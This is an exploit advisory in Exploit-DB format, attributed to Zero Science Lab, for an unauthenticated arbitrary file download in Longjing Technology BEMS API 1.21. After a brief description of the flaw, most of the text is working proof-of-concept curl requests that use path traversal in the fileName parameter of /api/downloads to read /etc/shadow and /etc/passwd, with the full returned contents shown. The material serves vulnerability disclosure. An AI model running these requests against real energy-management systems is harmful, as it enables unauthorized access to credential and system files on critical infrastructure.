81 lines
No EOL
2.5 KiB
Text
81 lines
No EOL
2.5 KiB
Text
# Exploit Title: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download
|
|
# Date: 05.07.2021
|
|
# Exploit Author: LiquidWorm
|
|
# Vendor Homepage: http://www.ljkj2012.com
|
|
|
|
Longjing Technology BEMS API 1.21 Remote Arbitrary File Download
|
|
|
|
|
|
Vendor: Longjing Technology
|
|
Product web page: http://www.ljkj2012.com
|
|
Affected version: 1.21
|
|
|
|
Summary: Battery Energy Management System.
|
|
|
|
Desc: The application suffers from an unauthenticated arbitrary
|
|
file download vulnerability. Input passed through the fileName
|
|
parameter through downloads endpoint is not properly verified
|
|
before being used to download files. This can be exploited to
|
|
disclose the contents of arbitrary and sensitive files through
|
|
directory traversal attacks.
|
|
|
|
Tested on: nginx/1.19.1
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2021-5657
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php
|
|
|
|
|
|
05.07.2021
|
|
|
|
--
|
|
|
|
|
|
$ curl -sk https://10.0.0.8/api/downloads?fileName=../../../../../../../../etc/shadow
|
|
|
|
root:*:18477:0:99999:7:::
|
|
daemon:*:18477:0:99999:7:::
|
|
bin:*:18477:0:99999:7:::
|
|
sys:*:18477:0:99999:7:::
|
|
sync:*:18477:0:99999:7:::
|
|
games:*:18477:0:99999:7:::
|
|
man:*:18477:0:99999:7:::
|
|
lp:*:18477:0:99999:7:::
|
|
mail:*:18477:0:99999:7:::
|
|
news:*:18477:0:99999:7:::
|
|
uucp:*:18477:0:99999:7:::
|
|
proxy:*:18477:0:99999:7:::
|
|
www-data:*:18477:0:99999:7:::
|
|
backup:*:18477:0:99999:7:::
|
|
list:*:18477:0:99999:7:::
|
|
irc:*:18477:0:99999:7:::
|
|
gnats:*:18477:0:99999:7:::
|
|
nobody:*:18477:0:99999:7:::
|
|
_apt:*:18477:0:99999:7:::
|
|
|
|
|
|
$ curl -sk https://10.0.0.8/api/downloads?fileName=../../../../../../../../etc/passwd
|
|
|
|
root:x:0:0:root:/root:/bin/bash
|
|
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
|
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
|
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
|
sync:x:4:65534:sync:/bin:/bin/sync
|
|
games:x:5:60:games:/usr/games:/usr/sbin/nologin
|
|
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
|
|
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
|
|
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
|
|
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
|
|
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
|
|
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
|
|
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
|
|
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
|
|
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
|
|
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
|
|
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
|
|
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
|
|
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin |